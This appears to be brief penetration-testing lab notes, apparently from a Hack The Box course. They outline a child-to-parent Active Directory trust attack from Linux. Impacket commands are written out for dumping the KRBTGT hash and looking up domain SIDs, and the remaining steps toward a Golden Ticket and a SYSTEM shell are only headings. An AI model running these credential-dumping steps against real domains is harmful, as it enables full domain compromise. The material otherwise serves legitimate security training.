attacking-domain-trusts-child-parent-trusts-from-linux
1. Obtain KRBTGT hash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt2. Obtain SID for child domain
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.2403. Obtain SID for Enterprise Admins group
4. Construct Golden Ticket
5. Set KRB5CCNAME environment variable
6. Gain SYSTEM shell on parent domain DC
7. Automate with raiseChild.py
Last updated